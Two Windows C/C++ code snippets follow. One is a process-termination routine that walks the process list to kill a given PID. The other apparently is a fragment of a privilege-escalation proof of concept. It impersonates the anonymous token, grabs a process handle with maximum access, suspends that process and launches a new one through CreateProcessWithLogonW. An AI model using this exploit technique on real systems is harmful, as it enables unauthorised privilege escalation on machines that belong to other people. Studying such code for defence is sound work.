static NTSTATUS NTAPI TerminatorTP1a( _In_ HANDLE ProcessId ) { NTSTATUS status; HANDLE processHandle = NtCurrentProcess(); ULONG i; if (!NtGetNextProcess) return STATUS_NOT_SUPPORTED; if (!NT_SUCCESS(status = NtGetNextProcess( NtCurrentProcess(), ProcessQueryAccess | PROCESS_TERMINATE, 0, 0, &processHandle ))) return status; for (i = 0; i < 1000; i++) // make sure we don't go into an infinite loop or something { HANDLE newProcessHandle; PROCESS_BASIC_INFORMATION basicInfo; if (NT_SUCCESS(PhGetProcessBasicInformation(processHandle, &basicInfo))) { if (basicInfo.UniqueProcessId == ProcessId) { PhTerminateProcess(processHandle, STATUS_SUCCESS); break; } } if (NT_SUCCESS(status = NtGetNextProcess( processHandle, ProcessQueryAccess | PROCESS_TERMINATE, 0, 0, &newProcessHandle ))) { NtClose(processHandle); processHandle = newProcessHandle; } else { NtClose(processHandle); break; } } return status; }
DWORD CALLBACK CaptureAndSuspendProcess(LPVOID) { ImpersonateAnonymousToken(GetCurrentThread()); while (NtGetNextProcess(nullptr, MAXIMUM_ALLOWED, 0, 0, &g_hProcess) != 0) { } NTSTATUS status = NtSuspendProcess(g_hProcess); printf("Suspended process: %08X %p %d\n", status, g_hProcess, GetProcessId(g_hProcess)); RevertToSelf(); SetProcessId(GetProcessId(g_hProcess)); WCHAR cmdline[] = L"notepad.exe"; STARTUPINFO startInfo = {}; PROCESS_INFORMATION procInfo = {}; startInfo.cb = sizeof(startInfo); if (CreateProcessWithLogonW(L"user", L"domain", L"password", LOGON_NETCREDENTIALS_ONLY, nullptr, cmdline, CREATE_SUSPENDED, nullptr, nullptr, &startInfo, &procInfo)) { printf("Created process %d\n", procInfo.dwProcessId); } else { printf("Create error: %d\n", GetLastError()); } TerminateProcess(g_hProcess, 0); ExitProcess(0); return 0; }